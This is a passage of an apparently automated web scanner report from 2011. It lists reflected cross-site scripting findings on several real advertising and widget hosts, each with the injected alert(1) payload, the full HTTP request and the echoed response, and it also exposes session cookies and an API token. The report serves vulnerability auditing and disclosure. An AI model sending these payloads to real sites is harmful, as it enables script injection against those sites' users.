udm_0=MLv39SEJaSpn5l6paNmEREzM5uAjEsBEbZba7uQQIHoALYGisPLsFHhBzkvhsvoTAE9Wvh6ZCxNEguR8S2rPkq36I/Y42ALDUOFLsElUcIPk9fKtZgFPAifF96YUyd0oLw0n0Ryt05wdrN868QJ/+5QhhVDeoAuh30DL1Nhh9Cj6Z6bFYRSzXtL17j6Azv6OJ7vZk+tBc1rGGFfHZ8KvQqVAuPohuFqyL9DCTu4N0Gi+vRwD/rSPuL1I9buZQs2FTpssoPA2lbNTF5HywZMTMvEJzT0Zf2UCkxkv4eFl2m+vJ05v7cxXSZCytfEePc3AVcKePos/B6yGLnOnYNZSbct435ntIpmH+aMoQIO1EEBT/KbMs4hz185mDkHl9ZhQ39ljvZDokrGoTU36gJfTJZI/AqWc0s0Xmbv+pE9pw7ldj41i8wbXyTCypJvRY2Q6QpW/VxvJxSNMtuSsgJLL78oDV0r4PR7nI83zsUuOS3RTLGmoD3dqyR4OH4CVdFAjOC5c1c5gtOr1VVOjgkORQRxylxYzirxZwMyP6/DKD8ngoLSc1GRKtnJzMc/bI0l4AEBF/cQi4iDXo+iRxGlBQS15VZXhxq88Nq17eHWw9sEvQd1KJzj3TkOH5xiza3lfPjV8/CHorrK/+Knobbr3hxTR+CDzj6HH90GGT11M9it+1+QA5nWCEArmpXBdmF6CsdzcoC8OR+A2ZnIOw21PFvMOjPJ0Xl4ibJjWNuZLTuB1pifXet2MrhoPp1+fInzsdxtGeHmDvcCDU5EzIBOGhIw1ek72Dd+mmWJa7p78Egukc2SG4u/GfEFrBJvicafxIMcv0rhZ8jG4whpHITo1dongFFkobD4S8XLrx2FfETkMJiYku6qW2LdkVjWOWQhvIn8h6J78k9hHbKJ/8ZAg0J7tKUKeAUHjqFcYAEZH0H9DcwWmXwEcnQEbhb9TCWm/0ppaG1RDf1n+fu24/+jM7KvN/z7/7q0u56jH+YrYa3a+P1ge47W+os0pZiaDQpJH0htz1ZJ9klEG2dBtkl1cI3R0VAnabjV6XDJT9jTTZOg12FcQncz8373PU7Ej0JkBaKIJAHku50JX6LtJ/FgCiFkaBBhVLHZvlusvhSNrYDJHBvuC8L8qGa82X1lUTBV7rlrFEvpcBgBGilPpJasi; rsi_us_1000000=pUP1Jk+jPwIQlm3EfKIIeTUeF/JvyQbq8mWZPtA01FS2ee8dNFxF4G+GnAMn9WcrwrlxaFqY0O/f2fJMysjjHKnHR1AyLyrV5YaNDkJ/Sz9iTSLWnrcqaeW9JQdk5xB8c5TT7BS5boeRjEXk88graUNSSoQBET1n8cYfeqxRms6DsyWntJXFg4q6t8nlTBXRhlT3ZnaU2QqHtEwjbkGX2cuE5sFvvxfDc0P1x1/YkINpgXca0zgdRWoC3FkTquy/LDHspJLb+6ye52i0gFZ8jaiDtEDQhwQMsqBgw+jJJuD5Y2BkMUQ3RbgfQY9C5tK/FmqYRFZ52k9CfvQzFcVI5PWBlmX8RPSEQN1nnPjNs01GIqNMz9awgCd4dP+vDcMlLAiX5AAQodEidAYP+DcEiCL0bX2IgR07U3iUVDf66rT8NwEy8uPRt4Q7j86Eak+GQEpZDNk7iHnphbuIOYn854kFrhr9LHPGiRTBN9SDG02GRydnp8QEtYyWpdxNzpAz9+BJpIyWBHWSXJU/lT8YMZc0rZpJ/9pq+rino+75Z7tI/xKhizjb7SgX/Zn1a38AtieO7F8k1YX9JM6IqYnbfNnzinjIJ/gcLiFPu6S+z7Sa5mI3O/WshNmzmWQg0GiPE4fCQCsyTxRgJ0dq2w==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sat, 09 Apr 2011 12:29:31 GMT
Cache-Control: max-age=86400, private
Expires: Sun, 10 Apr 2011 12:29:31 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sat, 09 Apr 2011 12:29:30 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "E05511220C2<SCRIPT>ALERT(1)</SCRIPT>ABFD15EFA4B" was not recognized.
*/

1.86. http://k.collective-media.net/cmadj/cm.foxnews/tier2_031010 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://k.collective-media.net
Path:   /cmadj/cm.foxnews/tier2_031010

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 346c9'-alert(1)-'a49eed7e1c6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/cm.foxnews346c9'-alert(1)-'a49eed7e1c6/tier2_031010;sz=300x250;net=cm;ord=1302538878;env=ifr;ord1=280882;cmpgurl=? HTTP/1.1
Host: k.collective-media.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?01AD=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA&01RI=90A4C54ACA8290D&01NA=&t=1302538875812&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f3c48b4c0582b; JY57=3cSilT0yz8Xh8jOg0fJAMcgeFnMmtGSsZeOSn2prstLRXgYh65wKGKA; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 11 Apr 2011 16:21:23 GMT
Connection: close
Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Tue, 12-Apr-2011 16:21:23 GMT
Set-Cookie: qcms=1; domain=collective-media.net; path=/; expires=Tue, 12-Apr-2011 16:21:23 GMT
Set-Cookie: nadp=1; domain=collective-media.net; path=/; expires=Mon, 18-Apr-2011 16:21:23 GMT
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Tue, 12-Apr-2011 00:21:23 GMT
Content-Length: 8003

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-40452658_1302538883","http://ib.adnxs.com/ptj?member=311&inv_code=cm.foxnews346c9'-alert(1)-'a49eed7e1c6&size=300x250&referrer=&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.foxnews346c9%27-alert%281%29-%27a49eed7e1c6%2Ftier2_031010%3Bnet%3Dcm%3Bu%3D%2Ccm-40452658_1302538883%2C11f3c48b4c0582b%2Cnone%2
...[SNIP]...

1.87. http://lfov.net/webrecorder/g/chimera.js [vid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://lfov.net
Path:   /webrecorder/g/chimera.js

Issue detail

The value of the vid request parameter is copied into the HTML document as plain text between tags. The payload 43832<img%20src%3da%20onerror%3dalert(1)>ac56b1b71cd was submitted in the vid parameter. This input was echoed as 43832<img src=a onerror=alert(1)>ac56b1b71cd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /webrecorder/g/chimera.js?vid=null43832<img%20src%3da%20onerror%3dalert(1)>ac56b1b71cd HTTP/1.1
Host: lfov.net
Proxy-Connection: keep-alive
Referer: http://www.ingeniux.com/solutions/website_optimization
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coyote-2-405e0b67=405e0b12:0

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Set-Cookie: LOOPFUSE="null43832<img src=a onerror=alert(1)>ac56b1b71cd"; Expires=Sun, 08-Apr-2012 00:18:53 GMT
Content-Length: 63
Date: Sat, 09 Apr 2011 00:18:53 GMT
Set-Cookie: Coyote-2-405e0b67=405e0b12:0; path=/


_lf_vid='null43832<img src=a onerror=alert(1)>ac56b1b71cd';


1.88. http://nmp.newsgator.com/NGBuzz/buzz.ashx [_dsrId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nmp.newsgator.com
Path:   /NGBuzz/buzz.ashx

Issue detail

The value of the _dsrId request parameter is copied into the HTML document as plain text between tags. The payload ac8c2<script>alert(1)</script>525de77e7b5 was submitted in the _dsrId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /NGBuzz/buzz.ashx?load=data&apiToken=291A707AAEE04CCC9A00B3B498001025&buzzId=216931&_dsrId=ngbuzz_216931_dataac8c2<script>alert(1)</script>525de77e7b5 HTTP/1.1
Host: nmp.newsgator.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="ALL DSP COR CUR IVDo OUR BUS UNI"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Last-Modified: Sat, 09 Apr 2011 12:09:30 GMT
ETag: 634379261703808200
Vary: Accept-Encoding
Content-Type: text/javascript; charset=utf-8
Cache-Control: public, max-age=300
Date: Sat, 09 Apr 2011 12:33:18 GMT
Connection: close
Content-Length: 1491

window.ng_scriptload({id:'ngbuzz_216931_dataac8c2<script>alert(1)</script>525de77e7b5',status:200,statusText:'200 OK',response:{Data:[{Description:'A Vermont legislative committee has give preliminary approval to a survey that establishes once and for all -- they think -- where St. Geo
...[SNIP]...

1.89. http://nmp.newsgator.com/NGBuzz/buzz.ashx [buzzId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nmp.newsgator.com
Path:   /NGBuzz/buzz.ashx

Issue detail

The value of the buzzId request parameter is copied into the HTML document as plain text between tags. The payload c96c0<script>alert(1)</script>33816bc20bf was submitted in the buzzId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /NGBuzz/buzz.ashx?buzzId=216931c96c0<script>alert(1)</script>33816bc20bf&apiToken=291A707AAEE04CCC9A00B3B498001025 HTTP/1.1
Host: nmp.newsgator.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="ALL DSP COR CUR IVDo OUR BUS UNI"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Content-Type: text/javascript; charset=utf-8
Cache-Control: private, max-age=600
Date: Sat, 09 Apr 2011 12:29:46 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 102

//An error occurred: Could not find Buzz item with id: 216931c96c0<script>alert(1)</script>33816bc20bf

1.90. http://nmp.newsgator.com/NGBuzz/buzz.ashx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nmp.newsgator.com
Path:   /NGBuzz/buzz.ashx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload e7d35%3balert(1)//9227b469b76 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e7d35;alert(1)//9227b469b76 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /NGBuzz/buzz.ashx?buzzId=216931&apiToken=291A707AAEE04CCC9A00B3B498001025&e7d35%3balert(1)//9227b469b76=1 HTTP/1.1
Host: nmp.newsgator.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="ALL DSP COR CUR IVDo OUR BUS UNI"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Last-Modified: Mon, 31 Jan 2011 21:21:01 GMT
ETag: 634320804615863350
Vary: Accept-Encoding
Content-Type: text/javascript; charset=utf-8
Cache-Control: public, max-age=600
Date: Sat, 09 Apr 2011 12:29:46 GMT
Connection: close
Content-Length: 11239

try{var buzzTemplate_216931="{if LoadScript(NGBaseUrl+\"HOST/\"+OrgCode+\"/js/jquery.min.js\", \"window.jQuery != null\") }\n{if location.hostname==\"hosted.newsgator.com\"}\n{eval}\n LoadCSS(\"http:
...[SNIP]...
6-2'},orgCode:'HATV',apiToken:'291A707AAEE04CCC9A00B3B498001025',name:'WPTZ - Home Page',buzzAppUrl:'http://nmp.newsgator.com/NGBUZZ/',buzzId:216931,directUrl:'http://hosted.newsgator.com/',extraArgs:{e7d35;alert(1)//9227b469b76:'1'},targetId:null});
           
           b._targetId = targetId;
           
           b.render();
       } else {
           setTimeout(function(){
               s();
           }, 50);
       }
   } catch(e){
       
   }
};
setTimeout(s, 1);
})();var bu
...[SNIP]...

1.91. http://pixel.adsafeprotected.com/jspix [anId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The value of the anId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5c2b8"-alert(1)-"845ae479775 was submitted in the anId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jspix?anId=1405c2b8"-alert(1)-"845ae479775&pubId=5079&campId=3993 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://y.cdn.adblade.com/imps.php?app=3993&output=html&cachebuster=1302543679&tpUrl=http://ads.bluelithium.com/clk?2,13%3B424d78c36f59429c%3B12f45a73f79,0%3B%3B%3B874369504,wT8nBQNzEgAO9YkAAAAAAHm3HgAAAAAAAgAAAAIAAAAAAP8AAAACDcxcHgAAAAAAYoEoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADPQQsAAAAAAAIAAgAAAAAAeT-nRS8BAAAAAAAAAGU4NjBlY2RhLTY0NjItMTFlMC05ZjY5LTAwMzA0OGQ2ZDg5NAA4nyoAAAA=,,http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F3%2Ffoxnews%2F300x250%2Fpolitics-bottom%3Ft%3D1302543676320%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html%26refer%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html,
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Mon, 11 Apr 2011 17:41:23 GMT
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=08823C762CB294BC2DF3AD18E0211AAB; Path=/
Connection: keep-alive
Content-Length: 8965


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://y.cdn.adblade.com/imps.php?app=3993&output=html&cachebuster=1302543679&tpUrl=http://ads.bluelithium.com/clk?2,13%3B424d78c36f59429c%3B12f45a
...[SNIP]...
olitics%252findex.html%26refer%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html,",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=1405c2b8"-alert(1)-"845ae479775&pubId=5079&campId=3993",
   debug : "false"
};

(function(){var f="3.6";var p=(adsafeVisParams.debug==="true");var z=2000;var A={INFO:"info",LOG:"log",DIR:"dir"};var k=function(F,H,D){if(typeof H==="und
...[SNIP]...

1.92. http://pixel.adsafeprotected.com/jspix [campId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The value of the campId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4ca31"-alert(1)-"cf0726d3c5a was submitted in the campId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jspix?anId=140&pubId=5079&campId=39934ca31"-alert(1)-"cf0726d3c5a HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://y.cdn.adblade.com/imps.php?app=3993&output=html&cachebuster=1302543679&tpUrl=http://ads.bluelithium.com/clk?2,13%3B424d78c36f59429c%3B12f45a73f79,0%3B%3B%3B874369504,wT8nBQNzEgAO9YkAAAAAAHm3HgAAAAAAAgAAAAIAAAAAAP8AAAACDcxcHgAAAAAAYoEoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADPQQsAAAAAAAIAAgAAAAAAeT-nRS8BAAAAAAAAAGU4NjBlY2RhLTY0NjItMTFlMC05ZjY5LTAwMzA0OGQ2ZDg5NAA4nyoAAAA=,,http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F3%2Ffoxnews%2F300x250%2Fpolitics-bottom%3Ft%3D1302543676320%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html%26refer%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html,
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Mon, 11 Apr 2011 17:41:23 GMT
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=36BC69FFFC71D2D1FFEF9321EAC627FB; Path=/
Connection: keep-alive
Content-Length: 8965


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://y.cdn.adblade.com/imps.php?app=3993&output=html&cachebuster=1302543679&tpUrl=http://ads.bluelithium.com/clk?2,13%3B424d78c36f59429c%3B12f45a
...[SNIP]...
26refer%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html,",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=140&pubId=5079&campId=39934ca31"-alert(1)-"cf0726d3c5a",
   debug : "false"
};

(function(){var f="3.6";var p=(adsafeVisParams.debug==="true");var z=2000;var A={INFO:"info",LOG:"log",DIR:"dir"};var k=function(F,H,D){if(typeof H==="undefined"){H=A.INFO;}if(p
...[SNIP]...

1.93. http://pixel.adsafeprotected.com/jspix [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d8b9"-alert(1)-"d0025db5af8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jspix?anId=140&pubId=5079&campId=3993&9d8b9"-alert(1)-"d0025db5af8=1 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://y.cdn.adblade.com/imps.php?app=3993&output=html&cachebuster=1302543679&tpUrl=http://ads.bluelithium.com/clk?2,13%3B424d78c36f59429c%3B12f45a73f79,0%3B%3B%3B874369504,wT8nBQNzEgAO9YkAAAAAAHm3HgAAAAAAAgAAAAIAAAAAAP8AAAACDcxcHgAAAAAAYoEoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADPQQsAAAAAAAIAAgAAAAAAeT-nRS8BAAAAAAAAAGU4NjBlY2RhLTY0NjItMTFlMC05ZjY5LTAwMzA0OGQ2ZDg5NAA4nyoAAAA=,,http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F3%2Ffoxnews%2F300x250%2Fpolitics-bottom%3Ft%3D1302543676320%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html%26refer%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html,
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Mon, 11 Apr 2011 17:41:22 GMT
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=9A8135652EFA0481F0614BB2AFFA2D7A; Path=/
Connection: keep-alive
Content-Length: 8968


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://y.cdn.adblade.com/imps.php?app=3993&output=html&cachebuster=1302543679&tpUrl=http://ads.bluelithium.com/clk?2,13%3B424d78c36f59429c%3B12f45a
...[SNIP]...
6refer%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html,",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=140&pubId=5079&campId=3993&9d8b9"-alert(1)-"d0025db5af8=1",
   debug : "false"
};

(function(){var f="3.6";var p=(adsafeVisParams.debug==="true");var z=2000;var A={INFO:"info",LOG:"log",DIR:"dir"};var k=function(F,H,D){if(typeof H==="undefined"){H=A.INFO;}if
...[SNIP]...

1.94. http://pixel.adsafeprotected.com/jspix [pubId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The value of the pubId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bc52a"-alert(1)-"98c6f3dade1 was submitted in the pubId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jspix?anId=140&pubId=5079bc52a"-alert(1)-"98c6f3dade1&campId=3993 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://y.cdn.adblade.com/imps.php?app=3993&output=html&cachebuster=1302543679&tpUrl=http://ads.bluelithium.com/clk?2,13%3B424d78c36f59429c%3B12f45a73f79,0%3B%3B%3B874369504,wT8nBQNzEgAO9YkAAAAAAHm3HgAAAAAAAgAAAAIAAAAAAP8AAAACDcxcHgAAAAAAYoEoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADPQQsAAAAAAAIAAgAAAAAAeT-nRS8BAAAAAAAAAGU4NjBlY2RhLTY0NjItMTFlMC05ZjY5LTAwMzA0OGQ2ZDg5NAA4nyoAAAA=,,http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F3%2Ffoxnews%2F300x250%2Fpolitics-bottom%3Ft%3D1302543676320%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html%26refer%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html,
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Mon, 11 Apr 2011 17:41:22 GMT
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=945AF54FF3FD3C6E3DFC25EB4FF01A5D; Path=/
Connection: keep-alive
Content-Length: 8965


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://y.cdn.adblade.com/imps.php?app=3993&output=html&cachebuster=1302543679&tpUrl=http://ads.bluelithium.com/clk?2,13%3B424d78c36f59429c%3B12f45a
...[SNIP]...
findex.html%26refer%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html,",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=140&pubId=5079bc52a"-alert(1)-"98c6f3dade1&campId=3993",
   debug : "false"
};

(function(){var f="3.6";var p=(adsafeVisParams.debug==="true");var z=2000;var A={INFO:"info",LOG:"log",DIR:"dir"};var k=function(F,H,D){if(typeof H==="undefined"){H=
...[SNIP]...

1.95. http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /admeld_sync

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 47500'%3balert(1)//51d2b9b58a7 was submitted in the admeld_callback parameter. This input was echoed as 47500';alert(1)//51d2b9b58a7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /admeld_sync?admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match47500'%3balert(1)//51d2b9b58a7 HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?t=1302539475030&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
